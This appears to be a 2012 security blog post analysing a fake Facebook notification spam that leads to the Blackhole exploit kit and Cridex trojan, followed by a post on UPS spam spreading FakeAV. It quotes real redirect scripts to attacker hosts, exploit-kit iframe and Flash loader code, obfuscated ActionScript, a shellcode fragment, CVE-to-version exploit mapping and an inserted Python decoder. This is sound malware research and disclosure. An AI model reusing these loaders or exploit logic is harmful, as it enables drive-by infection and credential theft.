Sunday, November 25, 2012

Full Disclosure: Analysis of Fake Facebook Notification redirect to Obfuscation Blackhole(PluginDetect 0.7.9) and infecting Cridex Malware

Important Case Infector Summary:
Fake Facebook Notif. (hacked WordPress) Redirector Host/IP: demarez.fr (new.htm) / 88.190.253.248
Blackhole Domain: delemiator.ru
Blackhole IP: 216.24.196.66, 202.180.221.186, 203.80.16.81, 208.87.243.131
Blackhole Proxy Port: 8080
Cridex CNC host: 180.235.150.72
Path: /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
@Hulk_Crusader reported the spam infection below to me; I opened the mail as HTML, as in the sample (screenshot) below. The link in it redirected me to a WordPress blog page, which in turn led me to the other URL mentioned above. I downloaded it and received an HTML page with the contents below, which leads us to the Blackhole EK:
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://delemiator・ru:8080/forum/links/column.php";}
</script>
</body>
</html>
That is BHEK's URL pattern, so I fetched column.php in the "right" way:
//settings...
--proxy=gatling
--retry=2
--cookies (cookies) to on
--keep-session-cookies (keepsessioncookies) to 1
--save-cookies (savecookies) to mycookies.txt
--user-agent (useragent) to MalwareMustDie was just knocking!
--referer (referer) to h00p://yzicalegur.wordpress.com/2012/11/22/you-have-notifications-pending-5/
//result...
--15:20:35--  h00p://delemiator.ru:8080/forum/links/column.php
           => `column.php'
Resolving delemiator.ru... seconds 0.00, 216.24.196.66, 202.180.221.186, 203.80.16.81, ...
Caching delemiator.ru => 216.24.196.66 202.180.221.186 203.80.16.81 208.87.243.131
Connecting to delemiator.ru|216.24.196.66|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5340 (new refcount 1).
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://yzicalegur.wordpress.com/2012/11/22/you-have-notifications-pending-5/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: delemiator.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 25 Nov 2012 06:20:32 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
15:20:39 (109.45 KB/s) - `column.php' saved [90019]
It contains obfuscated PluginDetect 0.7.9 code, a snippet of which was shown as a screenshot.

Here's the original version -->>[PASTEBIN]

Decoding Guide of Obfuscated PluginDetect 0.7.9

I made an easy decoding guide on how to decode it manually here -->>[PASTEBIN]. And here's the beautified version of the PluginDetect 0.7.9 that was burped out -->>[PASTEBIN]

Malicious infector files inside of this Exploit Kit

In this post I will focus on how to flush out the BHEK2 malwares. I'll go first with the well-known malicious infectors that "I know", then decode the PluginDetect code to burp out the rest of the infectors.

1) First, I downloaded the well-known components: spn.jar, spn2.jar, spn3.jar, t.pdf and getJavaInfo.jar, as described here --->>[PASTEBIN]
These samples are the same as in the previously analyzed post here -->>[HERE]
OK, next we must look at the code. Let's seek the PDF infector malwares first...

2) There are 2 (two) PDF downloader functions, p1() & p2(); the code is below:
function p1()
 {
   var d=document.createElement("div");
   d.innerHTML = "<iframe src=\"/forum/links/column.php?loh="+x("c833f")+"&gggijbpx="+x("occ")+"&xtppbw=2v:1k:1m:32:33:1k:1k:31:1j:1o&jbu="+x(pdfver.join("."))+"\"></iframe>";
   document.body.appendChild(d);
 }
function p2()
 {
   var d=document.createElement("div");
   d.innerHTML = "<iframe src=\"/forum/links/column.php?olnvlwxj="+x("c833f")+"&xdhhdvud="+x("c")+"&hgzmul=2v:1k:1m:32:33:1k:1k:31:1j:1o&ohu="+x(pdfver.join("."))+"\"></iframe>";
   document.body.appendChild(d);
 }
Here's how I cracked & downloaded those files -->>[PASTEBIN]. I named them infector1.pdf and infector2.pdf; below is the analysis report & a guide on how to decode them:
The infector1.pdf contains 4 (four) Adobe exploits & a shellcode to download the malware payload. The Adobe version condition per CVE used for infection is as follows:
   Adobe ver 9 or ver==8 or before 8.12 ====> CVE-2009-0927
   Adobe ver 7.1 ====> CVE-2008-2992
   Adobe ver 6 or ver 7 before ver < 7.11 ===> CVE-2007-5659
   Adobe ver >= 9.1 or ver <= 9.2 or ver >= 8.13 or ver <= 8.17 ==> CVE-2009-4324
Full guide to the analysis is here --->>[PASTEBIN]
The infector2.pdf contains 1 (one) Adobe exploit & a shellcode to download the malware payload: CVE-2010-0188, aiming at Adobe Reader ver <= 9.3 on Windows OS. Reference is here -->>[Adobe]. Full guide to the analysis is here --->>[PASTEBIN]
3) I saw 2 (two) SWF downloader functions, getCN() & ff2(); the code is as follows:
function getCN()
 {
   return "/forum/links/column.php?seyjjv="+x("c833f")+"&apvpjz="+x("cvwyb")+"&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe"
 }
function ff2()
 {
   var oSpan=document.createElement("span");
   var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
   oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='"+url+"' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
   document.body.appendChild(oSpan);
 }
Just decode the URL as per the PDF method above. Here's my log of downloading those SWFs -->>[PASTE]

The details of reversing BHEK 2.x/Plugindetect 0.7.9's field.swf & score.pdf

*) Thanks to @Hulk_Crusader, @Cephrus & @EricOpdyke for sticking together to crack this :-)
The first swf, "field.swf", contains malicious JavaScript code as hexed here -->>[PASTEBIN]. How the bad guys obfuscate this JS code to avoid AV detection is as follows:
1. The usage of variables with dull names (n+1) like:
   _local1, _local2, _localn,...,_localn+1
2. Camouflage of the malicious JS functions, like:
   [((((("c" + "") + "") + "a") + "l") + "l")]((((((("g" + "") + "e") + "t") + "C") + "") + "N"));
↑This means call("getCN"), i.e. calling the getCN() function, or...
    [((((("c" + "a") + "") + "l") + "") + "l")]((((((((((((("g" + "e") + "t") + "") + "B") + "l") + "o") + "c") + "k") + "S") + "i") + "z") + "e"));
↑This means calling the getBlockSize() function, or...
    [((((("c" + "") + "a") + "l") + "") + "l")]((((((((((((((("g" + "") + "e") + "") + "t") + "A") + "l") + "l") + "o") + "c") + "S") + "") + "i") + "z") + "e"));
↑This means calling the getAllocSize() function, or..
    [((((("c" + "") + "a") + "") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "A") + "l") + "l") + "o") + "cC") + "o") + "u") + "n") + "t"));
↑This means calling the getAllocCount() function, or..
   [((((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "B") + "y") + "t") + "e")]
↑This means calling the writeMultiByte() function, etc.
3. Furthermore, the malicious exploit exec calls use the same obfuscation, like:
   [((((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "B") + "y") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "F") + "i") + "l") + "l") + "B") + "y") + "t") + "e") + "s"))), (("u" + "t") + "f-16"));
↑This means:
    writeMultiByte(u(ExternalInterface.call("getFillBytes")), "utf-16");
4. And also the execution of the shellcode function written in PluginDetect:
   [(((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "ti") + "B") + "y") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "S") + "h") + "e") + "l") + "l") + "C") + "o") + "d") + "e"))), (((("u" + "t") + "f-") + "1") + "6"));
↑This means:
     writeMultiByte(u(ExternalInterface.call("getShellCode")), "utf-16");
5. Some string manipulations are also obfuscated, like the real example below:
   _local13[(((((((("p" + "o") + "s") + "i") + "t") + "") + "i") + "o") + "n")] 
↑This command means: position, to be used with the next variable, like:
   _local13.writeBytes(_local12);
You should replace them like below to make sense of it:
   position.writeBytes(_local12);
where _local12 can be traced ↓
   var _local12:* = new ByteArray();
   _local17 = _local12; 
   _local17[(((((((((((("w" + "r") + "i") + "t") + "e") + "M") + "u") + "l") + "t") + "i") + "By") + "t") + "e")](u(ExternalInterface[((("c" + "a") + "l") + "l")]((((((((((((("g" + "") + "e") + "t") + "F") + "i") + "l") + "l") + "B") + "y") + "t") + "e") + "s"))), (((("u" + "t") + "f-") + "1") + "6"));
    //↑writeMultiByte(u(ExternalInterface.call("getFillBytes")), "utf-16");
which goes straight to the shellcode execution written in PluginDetect logic.
6. You will see some variables initialised with what look like unused strings, like:
   var _local4:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?";
    var _local15:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?";
    var _local16:* = "zcxJGDRGyr?xwkxnrwZll&tPjcLRV-BkeWmoCLKInByTIh@ktS*KLrTvOxmR!YudlrTwiJpSoJgv?F!UOJ-U&GlcD@bLaaxnECM*JIYYqgzcgUgWV+l*qqMUCDPcg?dnPSlDWdNwCU**qjuCmFSRrWFPsXftJIcbu!GXQbS#JLdpwG&MBTZbM*aoNM?fjnXW!-p@-huCvOHHDRjkZl-hDiq!zJefCugAxcDNZDttqT#CKg&danx?Zp??IbamiA!g#bXaHvENSxZtGRhz?OGH!gkRJcLVjZUmfG-FEV*x?kufOhP#CPAfmgpLI+OEdeKxgJ#QoTgAwTzHViZfuLdEmv@mJTaWqtPGToM#SNkalDsuKEIcxybRWRvOpzwLyAZ!l!NhRAQq#wpGPHQ*RrSSkPeZpTMamIAqtkSrpCIqi#ekFdJrEJZjwzZ+j&ElPboxXlkzU@fRdhqZyHPUOOMQAugjRsidiYrPVDCVswvV!WBTpGtNQpAVRch@vgXd@lvRWAkeuRvx-wYtQgJNxNitRkcJyT@pDN?c&uJmNR?qtbMpldlRKdaLYANcmivSpNuaRLIdWSH*?DrQCNV@n??w-@H*EZkLuHXLv?tmcc#B!efqgIoYtPSJAZXWzmGAYAEhEDKtRL@iZJDmadRz&SHoIr@QnKVqhutl!ExiVPypWNXqy!tvSMHebh@oeVVSeWxac&qDGEgI*TuegMVE!TGlIl-VzBYK@@dFWfrn@AW?v+UgZEhER!kxK!vHJb@ykm!klky+qsUErqrTG?eZhS#!ThoDKf@CZDcdHTIdEnLr@y*TsVxG-AGsISRHgIwp#ksofYmayYT@OyHmRCZL*YGDRmdZzBMfgsOyurjhcTw-TT#AM!yn*rgWOdnmAhR?RPI*gQAgaJc&DTKymIaq?r!yhHVqr!lzxVc?ymvDvBgUPzbfky#*uHPAljgLoIHwHlwOcTlRRUTtsG!ZgCSATvafsYUrag+NL-@H!gHm@F&FD*#rtn@AsNyLu!CEOEm*opZlr?VAH?CiSBbWpJ!+*C+XMkXhTA+jQUSIB*oAtlA-y@mJ@jHjgGqPnNVW&IF*iH?j&Pm*&sQbKOg*UwrfEmK@OAeAZgRaEnExMcxQmnVTRVWqewvNY-tyzC*HAVw?vhi!LVxTqLBksWqs*lOCQ!CwMau+sFLvUm?abXwu!cncl!JvcaWTqyXpNorkEnVldW?GYgGNDmSKFwiEqauSYTMSRmIrBEQwPxb-rbHuxiz-@ic&tPh!&BVADXW@jFCGwrEQmlBuAQHtpFW-ajxa*!wKo&KcnqoEsVWnO-aXJcDIMlwkshdPm*JncJVIilDxtaQbYIWzBaSYawQ!eX?rGsri!RVQYLBiCCqpooHhHP#AozyrvUdcCtYVsvIyoP?WUJMcOPJf!qoMOiPVWL+Pmuz-LLmU+xXLT#OAaA+!PhP*MjQse?uRnGgWqNC!iM?zOat#!sbxmeH-ZCEwAucUXgRuPbNGvPzUy+Yn@&oCQwpVWWTcuqEUBpZrv!bC-KzMZMr!d*Ly@nN*x!oSECeqnaF&ZCeNOcFbphES#wg*NAmvuT!MAo#fKBN*&rozfkba@!&tidlLTl?ECrkAAcRsO#E&b?@G?iEhhrUAMqjsfhSk#+nLDKJGViEWdjyNFNLwUh+kbRyGXzLOxxOBLuk-LuqnG??dVzAdKTbcBp&e@YvgMctjX!SOBYCoIqEQLW+KaVUBS*xLfG#xDpSEbotTKYcGv!iK?*!nUbucr-FGH+saxGXoV?IyaH!On+r-WHZ+IQTJZNTt@uPxcaNBeFd?wUipECbXswVKTUoErnLe-CTI*PyxRPu?YXGQVs?R*A-IkjyYeSCLceakszQAMmMviflWSlgoDmROlff@*mcvnPyAblAHjAkXh#LpychVfF#GQNYDd#tuGNhYQaM#wLlTty*O@+NlrgkEFLDwgP?H!kznkUgQvbnbzivKgXiDvd
tlWur-kqvvuxIRWHNcsgM-bS-BwcMVqJ&NWKdqPmPt?EHSSoXTXYscBhPxlOpiRhrXdNlohJDh!s*&GekAyGVp*CbOgLsprkECHgIEkyBtKqL-jtNaFdSZqxQAsXpeSsmugPdgupvIHHiW!QX#BKjQWuqMrcHvCeA&OMxcbzlKUfJkyAELR#FftyTrHHAVa&ZCu&XYeDoEqwahfdnbQ#rInjyEYZKMIyjCOspckK-vwTYWzUwqlTSbRiHekhfCMBU&LURksZzatvbsJJnC!OaCrNiAbLoeerfKfNYE*BDvxOGfZ?xtdZcJ&TRlvVUKgRFBrDjca@cCnG&&FfFNreRgP@xHfVglB!WZMzLhdnTxYpprLbgGCpA#SLtllz-rc";
↑Of the above strings only "_local4" is actually used (it is passed into [score.swf]); the rest are garbage.
OK, we can read it. Now what does it mean? Here's the simple explanation:
1. It loads the URL defined in PluginDetect's [getCN()] function, which as explained above will download score.swf
2. It exploits CVE-2011-0611 using the shellcode provided by [PluginDetect shellcode()], then executes the payload download, or..
3. ..it will lead you directly to the payload download.
The second swf (score.swf) was decoded here -->>[PASTEBIN]. field.swf has the obfuscation pattern as per below:
1. The usage of cluttered strings to camouflage the real meaning:
   [(((((((((("v" + "") + "e") + "r") + "") + "s") + "i") + "o") + "") + "") + "n")];
↑This means "version"
2. Obfuscation of a Java command in cluttered strings in a var:
   _local3[((((("r" + "e") + "ve") + "r") + "s") + "e")]();
↑This means the usage of the function reverse()
3. A "hidden" swap operation of a particular string to null, to deobfuscate the code:
   _local2 = this.str_replace(_local2, ((((((((((((((("!" + "X") + "X") + "") + "X") + "X") + "!0") + "3") + "9") + "4") + "3") + "4!") + "X") + "X") + "X") + "!"), "");
↑This means the command: str_replace("!XXXX!039434XXX!", "")
PS: Many swf malware JS obfuscations use this method, as per the cases in: i) Contagio blog -->>[HERE], and ii) StopMalvertising blog -->>[HERE]
4. There is an important obfuscation which is the clue to the exploit used:
    _local14[(((((((((((("" + "l") + "o") + "") + "a") + "d") + "B") + "y") + "t") + "e") + "") + "") + "s")](this.h2b(_local2));
     _local14 = this;
     _local14[((((((((((("a" + "") + "d") + "") + "d") + "") + "") + "C") + "h") + "i") + "l") + "d")](_local4);
↑This reveals the loadBytes() and addChild() Flash functions, which are used to load and execute a media.
How does the exploit of score.swf go?
In this file there's a string of bytes as per below:
_local13 = new Array(54, 54, 69, 51, 54, 57, 65, 48, 49, 48, 70, 70, 48, 69, 53, 52, 56, 49, 53, 48, 57, 53, 70, 50, 49, 70, 49, 68, 70, 51, 54, 48, 57, 53, 54, 68,...
which is gathered by the generator below (the decompiler lowercased the names; String.fromCharCode turns each array element into one character):
 _local2 = "";
 i = 0;
 while (i < _local13.length) {
     _local2 = (_local2 + String.fromCharCode(_local13[i]));
     i++;
 };
And after being filtered and reversed() it will be loaded into memory with the loadBytes() and addChild() mentioned above. You will see the swf crash & free a pointer as described in the PoC of CVE-2012-0769 presented at BlackHat US 2012 -->>[HERE]. The concept is the same as the PoC's pattern:
for(i=0;i<0x200;i++){bd=new BitmapData(size,0x1,false,0xCCCCCC);} //<#jackpot!
In our case, the square pattern was written in strings executed by addChild().
I spent enough time testing score.swf to conclude that no direct payload exists in it. Yet, as per its name, it is used to "score" the exploit state for the arbitrary code execution of OTHER JS/code evil functions (either in PluginDetect, other SWFs or PDFs) that are related to dropping/downloading the payloads of the BHEK2.x set. The memory dump of score.swf is here --->>[PASTEBIN]

Conclusion:

1. score.swf, field.swf & PluginDetect's JS functions call each other, implying one inseparable package.
2. Every Java function from PluginDetect 0.7.9 calls functions under the infector components after being loaded, and the Exploit + Infection scheme runs in memory, suggesting that all traces of the infection can be traced with Forensics or Dynamic Memory Analysis.
3. It is important to know how these moronz obfuscate the code, so that automation tools can be adjusted to detect these properly.
4) And we have a shellcode function as below:
function getShellCode()
 { 
   var a="8200!%5482!%4451!%e015!%51d5!%c4c5!%34e0!%5191!.. 
!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7..   
8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3af..
77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!..
   ..1414!%".split("").reverse().join("");
   return str_replace((window.document)?"%!":"", "%u", a) }  
It is important to remember that inside this shellcode there is a connection with the payload, usually via a URL, or it drops a binary to download the payloads.. The decoding guide is here --->>[PASTEBIN]. The downloaded payload is a Cridex Trojan, with the following activities:
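Added example, not code from the page or from the kit: the two decoding chains described above reproduced in Python for analysis, score.swf's fromCharCode -> str_replace -> reverse -> h2b loader (with a header check on what loadBytes() would receive) and getShellCode()'s reversed "%!" string. The array prefix is the one quoted from score.swf; the sample payloads are constructed, and it is my assumption that reverse() runs over the hex text character by character.

```python
import re
import struct

# The marker score.swf removes with str_replace() before h2b() (see above).
MARKER = "!XXXX!039434XXX!"
SWF_MAGICS = {b"FWS": "SWF, uncompressed", b"CWS": "SWF, zlib", b"ZWS": "SWF, lzma"}

# Prefix of the _local13 array copied from the page (the rest is elided there).
PAGE_PREFIX = [54, 54, 69, 51, 54, 57, 65, 48, 49, 48, 70, 70, 48, 69, 53, 52,
               56, 49, 53, 48, 57, 53, 70, 50, 49, 70, 49, 68, 70, 51, 54, 48,
               57, 53, 54, 68]


def codes_to_text(codes):
    """The page's generator loop: String.fromCharCode over each array element."""
    return "".join(chr(c) for c in codes)


def is_hex_text(text):
    """Sanity check before h2b(): non-empty, even length, hex digits only."""
    return len(text) > 0 and len(text) % 2 == 0 and \
        all(c in "0123456789abcdefABCDEF" for c in text)


def decode_score_blob(codes, marker=MARKER):
    """fromCharCode -> str_replace(marker, "") -> reverse() -> h2b().
    Assumption (the page does not show what _local3 is): reverse() runs over
    the hex text character by character, before the hex-to-bytes step."""
    text = codes_to_text(codes).replace(marker, "")[::-1]
    if not is_hex_text(text):
        raise ValueError("filtered text is not hex: %r" % text[:32])
    return bytes.fromhex(text)


def classify(blob):
    """What loadBytes() is about to receive: a nested SWF, or something else."""
    return SWF_MAGICS.get(blob[:3], "not a SWF header")


def decode_shellcode_string(a):
    """getShellCode(): reverse the string, replace "%!" by "%u", then read the
    %uXXXX units the way unescape() would (16-bit, little-endian in memory).
    The result is what an analyst hashes or feeds to a disassembler."""
    s = a[::-1].replace("%!", "%u")
    units = re.findall(r"%u([0-9A-Fa-f]{4})", s)
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)


# --- constructed test vectors (not the real score.swf / shellcode data) -------

def build_score_vector(payload, marker=MARKER):
    """Inverse of decode_score_blob, used only to construct a sample array."""
    text = payload.hex().upper()[::-1]
    text = text[:6] + marker + text[6:] + marker      # sprinkle the junk marker
    return [ord(c) for c in text]


def build_shellcode_string(data):
    """Inverse of decode_shellcode_string, used only to construct a sample."""
    units = struct.unpack("<%dH" % (len(data) // 2), data)
    return "".join("%%u%04x" % u for u in units).replace("%u", "%!")[::-1]


if __name__ == "__main__":
    text = codes_to_text(PAGE_PREFIX)
    print("page prefix decodes to:", text, "hex text:", is_hex_text(text))
    sample_swf = b"CWS\x0a" + bytes(range(16))          # constructed payload
    blob = decode_score_blob(build_score_vector(sample_swf))
    print("loadBytes() would get:", classify(blob), blob == sample_swf)
    enc = build_shellcode_string(b"MalwareMustDie!!")   # constructed payload
    print(enc[:12] + "...", decode_shellcode_string(enc))
```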
1. Copied files (itself) using API: CopyFileW(lpExistingFileName: "C:\TEST\sample.exe", lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe", bFailIfExists: 0x0)
  Into directory:
   C:\Documents and Settings\User\Application Data\KB00085031.exe
2. Do the self deletion after drop...
3. Creating three memory injection processes:
     CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0xf0ed50, lpParameter: 0xf00000, dwCreationFlags: 0x0, lpThreadId: 0x0)
     CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x92ed50, lpParameter: 0x920000, dwCreationFlags: 0x0, lpThreadId: 0x0)
     CreateRemoteThread(hProcess: 0x7c, lpThreadAttributes: 0x0, dwStackSize: 0x0, lpStartAddress: 0x2a5ed50, lpParameter: 0x2a50000, dwCreationFlags: 0x0, lpThreadId: 0x0)
4. Which resulted in the new processes appearing below:
   0xb8 KB00085031.exe 
   0xec cmd.exe 0x7e4 
   0x348 svchost.exe 
5. Sends your credentials data to the remote hosts....
For the registry, it made an autorun, changed the internet settings & cache, and put a long encrypted data blob too. Here's the RegShot data -->>[PASTEBIN]
As for the Network Analysis, it did an HTTP POST to 180.235.150.72, sending the request: POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Communication to the CNC in snipped txt is here --->>[PASTEBIN]
The malware process that I snapped was shown in a screenshot. Previous reference of this trojan, as analyzed in a previous post, is here -->>[HERE]
*) The Network & Registry analysis raws can be fetched below the sample download.

References

Here's the pic (screenshot) of the total captured files in this story. Here's the sample for research purposes -->>[CLICK]
Here's the PCAP & RegShot full data download -->>[CLICK]
Here's my LOG during analysis -->>[CLICK]
Below is the VT analysis result of the unique samples:
   column.php      abcd2644de8c447578d88dd4fd1e3508  VT(2/44)
   field.swf       aab57a979a6411578ae66ed676394d12  VT(8/44)
   infector1.pdf   465cb634d94d0b16cc1828b6222f0e09  VT(19/44)
   infector2.pdf   4bb885be4b547aa70d4910422f89d546  VT(20/44)
   score.swf       8ee6d435e5bb423671bd03728745bd0b  VT(9/44)
   spn.jar         61db98323b8d0512e618f74f70d583ae  VT(2/44)
   spn2.jar        8d0f9fc0a05b2acaecfef2f5d88a1121  VT(4/44)
   spn3.jar        d56e54b431189a1b2a02be243574e829  VT(3/44)
   t.pdf           d1e2ff36a6c882b289d3b736d915a6cc  VT(21/43)
   wpbt0.dll       8229f69bc416cdca7f314f19fe7b4e18  VT(6/42)

#MalwareMustDie

Saturday, November 24, 2012

How, from where, by which IP you got infected w/FakeAV: System Progressive Protection; UPS Fake Spam, Spain's Front End Infector+Support Page, and Taiwan's CnC server

Today I received a report of another UPS spam (again, thanks to officer Pryor), which leads users to download the FakeAV "System Progressive Protection". This investigation exposes all aspects of the infection: which spam, which trojan downloader was used, which CnC was used for communication, and down to the support page.

Infection Summary

1. Drive-by spam
2. w/ HTML URL to h00p://proyectosnavarra.es/CMUNFWKUWY.html ←Troj/Downloader's dropper
3. Trojan downloads the FakeAV installer from the IPs: 217.76.130.213 (Spain), 59.126.131.132 (Taiwan), 61.222.241.208 (Taiwan) & 217.76.130.3 (Spain)
4. Sends data to these IPs: 59.126.131.132, 61.222.241.208 (Taiwan)
5. Support Center is at this IP: 178.32.29.188 (Spain)

All of the data is written as it is; for law evidence & research purposes I also share the samples and captures. I am sorry for taking so long to analyze this, since I have only one Windows machine to perform all of this analysis.

Here we go..

Following another reported UPS email like below (screenshot)...

which leads us to the link:
h00p://proyectosnavarra・es/CMUNFWKUWY.html
One thing I LOVE about spam infections is that we can fetch the sample easily...
--15:36:04--  h00p://proyectosnavarra.es/Receipt.zip
           => `Receipt.zip'
Resolving proyectosnavarra.es... 217.76.130.213, 217.76.130.3
Connecting to proyectosnavarra.es|217.76.130.213|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 93,060 (91K) [application/x-zip-compressed]
15:36:07 (56.43 KB/s) - `Receipt.zip' saved [93060/93060]
It's a zip alright...
0000   50 4B 03 04 14 00 00 00 08 00 45 87 77 41 F1 63    PK........E.wA.c
0010   BA 03 FE 6A 01 00 00 5C 02 00 12 00 00 00 50 6F    ...j..........Po
0020   73 74 61 6C 5F 52 65 63 65 69 70 74 2E 65 78 65    stal_Receipt.exe
0030   EC BD 7D 7C 54 D5 B5 30 7C 66 E6 64 72 92 4C 72    ..}|T..0|f.dr.Lr
0040   06 48 30 40 80 00 41 D1 A0 46 87 68 E2 10 9C 18    .H0@..A..F.h....
0050   26 C4 8F E0 C4 C0 0C 11 12 E8 15 D2 38 A5 95 C2    &...........8...
0060   39 80 95 40 D2 93 A1 39 39 8E A5 AD DC 6B AF 7A    9..@...99....k.z
0070   2B 0F 7A 1F 7D DA DB DA 56 3E FC 00 67 08 E6 43    +.z.}...V>..g..C
0080   91 86 8F 62 28 41 07 4D 71 8F 27 62 10 4C 26 10    ...b(A.Mq.'b.L&.
